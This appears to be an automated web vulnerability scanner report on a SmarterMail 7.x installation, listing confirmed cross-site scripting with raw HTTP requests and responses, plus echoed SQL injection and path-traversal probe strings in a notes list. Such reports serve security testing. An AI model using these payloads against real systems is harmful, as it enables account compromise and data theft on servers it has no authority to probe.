Parameters

Parameter	Type	Value
__EVENTTARGET	POST	ctl00$BrPH$btnOK
__EVENTARGUMENT	POST	3
__VIEWSTATE	POST	/wEPDwUKMTM5MjY3MTI5MQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgEPZBYCZg9kFgJmDw8WAh8DBQhVc2VybmFtZWRkZPswbOrdpTXGEdzIVEhkKOfRMh2Y
ctl00%24MPH%24txtDestMailbox_SettingText	POST	'"--><script>alert(0x003A5E)</script>
ctl00%24MPH%24txtDestFolder_SettingText	POST	3

Request

POST /Main/frmPopupCopyArchiveMessagesToMailbox.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupCopyArchiveMessagesToMailbox.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24btnOK&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUKMTM5MjY3MTI5MQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgEPZBYCZg9kFgJmDw8WAh8DBQhVc2VybmFtZWRkZPswbOrdpTXGEdzIVEhkKOfRMh2Y&ctl00%24MPH%24txtDestMailbox_SettingText='%22--%3e%3cscript%3enetsparker(0x003A5E)%3c%2fscript%3e&ctl00%24MPH%24txtDestFolder_SettingText=3

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:37:23 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2900
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
Copy To Mailbox
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Popup/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />

<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmPopupCopyArchiveMessagesToMailbox.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTM5MjY3MTI5MQ8WBB4QX19fUmVzdWx0RmFpbHVyZQVUVGhlIGFjY291bnQgWyciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzQTVFKTwvc2NyaXB0PkBob3l0bGxjLmNvbV0gZG9lcyBub3QgZXhpc3QuHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgYCBQ8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8CZxYCAgEPFgIeBFRleHQF0QE8ZGl2IGNsYXNzPSJUaXBUZXh0RmFpbHVyZSI+PGltZyBzcmM9Ii9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL0ljb25zL1RpcFRleHQvRmFpbHVyZS5naWYiIGFsdD0iIi8gYWxpZ249ImFic21pZGRsZSI+IFRoZSBhY2NvdW50IFsnIi0tPjxzY3JpcHQ+bmV0c3BhcmtlcigweDAwM0E1RSk8L3NjcmlwdD5AaG95dGxsYy5jb21dIGRvZXMgbm90IGV4aXN0LjwvZGl2PmQCCw9kFgICAQ9kFgJmD2QWAmYPDxYCHwMFCFVzZXJuYW1lZGRkB0iSKOGWhtLBlhbaEz3HAy+UPiM=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>

<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>

<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>

<script language="javascript" type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
$(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
</script>

<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>

<span id="ctl00_UpdatePanel1">
<div id="ctl00_TipTextDiv" class="TipTextContainer">
<div class="TipTextFailure"><img src="/App_Themes/Default/Images/Icons/TipText/Failure.gif" alt=""/ align="absmiddle"> The account ['"--><script>netsparker(0x003A5E)</script>@hoytllc.com] does not exist.</div>
</div>
</span>

<div id="Scrollable" class="ContentDiv">

<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_txtDestMailbox">
<td id="ctl00_MPH_txtDestMailbox_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtDestMailbox_Setting" class="Setting"><input name="ctl00$MPH$txtDestMailbox_SettingText" type="text" value="'"--><script>netsparker(0x003A5E)</script>" id="ctl00_MPH_txtDestMailbox_SettingText" class="text" /></td>
</tr><tr id="ctl00_MPH_txtDestFolder">
<td id="ctl00_MPH_txtDestFolder_Label" class="Indent Fixed">Folder</td><td id="ctl00_MPH_txtDestFolder_Setting" class="Setting"><input name="ctl00$MPH$txtDestFolder_SettingText" type="text" value="3" id="ctl00_MPH_txtDestFolder_SettingText" class="text" /></td>
</tr>
</table>

</div>
<div id="ctl00_Button" class="PopupButtons">
<div class="ButtonBarLeft">

</div>
<div class="ButtonBarRight">

<div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup();; return false;"><span class="BBInner">Cancel</span></a></div>
<div id="ctl00_BrPH_btnOK" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$btnOK',''); return false;"><span class="BBInner">OK</span></a></div>

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
 </div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
Sys.Application.add_init(function() {if (self.valSwitchTab) self.valSwitchTab();});modules['isPostBack']=true;modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtDestMailbox_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Folder","vcID":"ctl00_MPH_txtDestFolder_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
//]]>
</script>
</form>
</body>
</html>

- /Main/frmNotes.aspx

/Main/frmNotes.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Parameters

Parameter	Type	Value
ctl00%24MPH%24txtNote_SettingText	POST	'"--><script>alert(0x005DC0)</script>

Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:17:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11019
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />

<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkdPHNjcmlwdD5ucygweDAwNUNEMSk8L3NjcmlwdD4VAwABIB08c2NyaXB0Pm5zKDB4MDA1Y2QxKTwvc2NyaXB0PhQrAwNnZ2dkZAIGDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwloFgICAQ8WAh4EVGV4dGVkAggPFgIfCWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfCgUMMTg0NSBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwzN3wwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGSx2MHk102+VgouU7iWTZ/qxhU+vA==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>

<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>

<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>

<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
 </div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="<script>ns(0x005cd1)</script>"><script>ns(0x005CD1)</script></option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>

<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">

<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">

<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" name="ctl00_MPH_HyperGrid1_CB64_NjAxZGY1YWMzOWM1NGYxZGFlMjk5NmE4ZGNhMGNiNzk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x005DC0)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" name="ctl00_MPH_HyperGrid1_CB64_MWVlOGFlMzNhYmIxNDcxZDhlYjg1YjkyYjYxYWUzZmE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">../../../../../CANTBEHERE/../../../../../etc/httpd/logs/error.log</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" name="ctl00_MPH_HyperGrid1_CB64_NGE5YjdmOThjMTBiNDdkNTljZDYwZWYxODRmODFiMzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">-111 OR SLEEP(25)=0 LIMIT 1-- </td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" name="ctl00_MPH_HyperGrid1_CB64_NWQyYjViYzg2N2RlNDdhZGJlZWRlMTRlZTU3MDM5NGQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">1 OR X='ss</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" name="ctl00_MPH_HyperGrid1_CB64_ZWY5Y2Q4YmUwZjIyNDhjNzk0YjhjOTA4MWI1MGU4NmI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" name="ctl00_MPH_HyperGrid1_CB64_MzQ5YTU4YmIxNDU4NDllNThhNDVmZjczNDIzMTljY2Q-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">' OR '1'='1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" name="ctl00_MPH_HyperGrid1_CB64_MTFmMWM3OGJhNGZkNDBkNDljMzBlZjdiNWM5ZTM2ODY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">      </td></tr></table></td><td class="leftpad">-1 OR 17-7=10</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" name="ctl00_MPH_HyperGrid1_CB64_YzNhZDU4NjU1OTRjNGU2NmI2YzgwNGJmZmNhNDdjNTk-" /></td><td class="SmallImage"><table class="No..

Total Requests

Average Speed

SCAN SETTINGS

VULNERABILITIES

Permanent Cross-site Scripting

Impact

Remedy

Remedy References

External References

/Main/frmSyncMLList.aspx CONFIRMED

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmNote.aspx CONFIRMED

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmNotes.aspx CONFIRMED

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmTask.aspx CONFIRMED

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmCalendar.aspx CONFIRMED

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

Password Transmitted Over HTTP

Impact

Actions to Take

Remedy

/Main/frmChangePasswordWizard.aspx CONFIRMED

Form target action

Request

Response

[Possible] Permanent Cross-site Scripting

Impact

Remedy

Remedy References

External References

/Main/frmSyncMLList.aspx

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmNotes.aspx

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmTask.aspx

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmCalendar.aspx

Injection URL

Injection Request

Identification Request

Injection Response

Identification Response

/Main/frmContact.aspx

Injection URL

Injection Request